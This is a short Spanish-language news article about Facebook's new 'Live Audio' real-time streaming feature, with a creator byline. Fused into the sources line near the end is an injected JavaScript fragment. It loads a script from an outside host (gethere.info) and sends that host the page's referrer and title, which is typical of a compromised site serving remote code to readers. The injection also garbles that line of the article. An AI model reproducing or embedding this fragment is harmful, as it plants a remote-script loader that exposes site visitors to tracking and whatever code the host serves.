‘Live Audio’, la nueva función de Facebook

La transmisión sería en tiempo real y podrán grabarse desde entrevistas hasta lecturas de libros

CDMX.- Facebook lanzó este miércoles “Live Audio”, una nueva forma de transmitir en tiempo real en la red social.

La firma indicó en un comunicado que decidió apostar por esta nueva opción tras darse cuenta de que los usuarios a veces prefieren “contar una historia en palabras y no en video”.

Al iniciar una transmisión de Audio, tus contactos recibirán una notificación. Además, habrá un buscador de “Live Audios” que permitirá descubrir nuevas transmisiones.

“Desde entrevistas hasta lectura de libros, vemos una gran oportunidad por el nivel de interacción que “Live Audio” aporta tanto a los emisores como a los oyentes. Del mismo modo que con los videos en vivo, los oyentes podrán descubrir contenido de audio en vivo en su sección de noticias y utilizar los botones de reacciones”, indicó Facebook.

La función de “Live Audio” también incorpora una opción para conectar con audiencias en tiempo real desde áreas con poca conectividad.

La semana pasada, la red social de Zuckerberg lanzó Live 360 y hoy estamos contentos de anunciar una nueva manera de transmitir en tiempo real en Facebook: “Live Audio”.

LA HERRAMIENTA
> Su funcionamiento será muy similar al de los típicos podcasts que se podrían escuchar en otros servicios, donde el emisor comenzará un nuevo programa en directo que los usuarios podrán escuchar, además de poder compartir su opinión, dejar preguntas o emitir reacciones directamente desde el feed de noticias.

Con información de agenciass.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado